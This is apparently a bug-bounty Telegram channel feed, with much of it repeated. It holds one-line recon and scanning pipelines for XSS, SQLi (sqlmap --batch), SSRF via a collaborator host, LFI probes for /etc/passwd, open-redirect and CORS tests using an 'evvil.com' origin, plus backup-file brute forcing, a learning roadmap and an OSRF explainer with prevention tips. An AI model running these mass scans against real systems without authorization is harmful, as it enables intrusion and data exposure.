Today I made a video that uses a tool through the video and can detect xss through a tool without having to do anything else.
🔥13
🚀 Automated XSS Methodology for Bug Bounty Hunters | 1-Click Exploits
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
YouTube
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
❤10👍2
👨💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
🔥18❤14👍8🥰4
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
❤10👍2🤡2⚡1👎1🖕1
Bug - Information disclosure on restricted subdomain
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
👍33🔥11❤4
Automated JS Endpoint Extraction and Verification with HTTPX and Gau
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
❤24👍10🔥9😎1
Sorry I can't give you anything or watch any videos because I'm really busy with my college for a few days and I have some work to do.
🙏17❤9⚡3🤩2👎1💔1
2025 Roadmap:
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
🔥15❤8👍3
Find XSS Using KNOXSS
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
# Subdomain Enumerationsubfinder -d domain -all | tee -a domain.subs
subdominator -d domain | tee -a domain.subs
# Check live subdomains
cat domain.subs | httpx -o domain.live
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau |anew xss.txt
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau | anew xss.txt
cat xss.txt |sort -u | grep "=" | egrep -iv ".(css|woff|woff2|txt|js|m4r|m4p|m4b|ipa|asa|pkg|crash|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|webp|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|webm|mpp|_otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|_ttf|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)" | uro | httpx | anew xss
#Run knoxnl With GET & POST Methods
knoxnl -i xss.txt -X BOTH -s -o xssoutput.txt
2❤24👍8🔥6👎2
Live Bug Bounty Hunting: The Ultimate Checklist to Level Up Your Skills | Bugcrowd | part-(1)
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
❤11👍5🔥3
🔖 On-Site Request Forgery (OSRF): An Overview
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
Look for inputs that can be reflected in attributes like
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
src Attributes Look for inputs that can be reflected in attributes like
src. Example vulnerable tags: html
<img src="OUR_INPUT_HERE">
<video width="400" height="200" controls src="OUR_INPUT_HERE">
<audio src="OUR_INPUT_HERE">
<iframe src="OUR_INPUT_HERE">
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
GET /settings.php?remove_account=1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
src, are properly validated and sanitized. 3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
GitHub
AllAboutBugBounty/On Site Request Forgery.md at master · daffainfo/AllAboutBugBounty
All about bug bounty (bypasses, payloads, and etc) - daffainfo/AllAboutBugBounty
❤15👍6
subdomainRecon.txt
3.1 KB
I have given this file because many of my subscribers requested it. However, I would like to make one request to you, that is, share my YouTube channel and Telegram channel more.
👍37❤🔥15❤11🔥5🥰2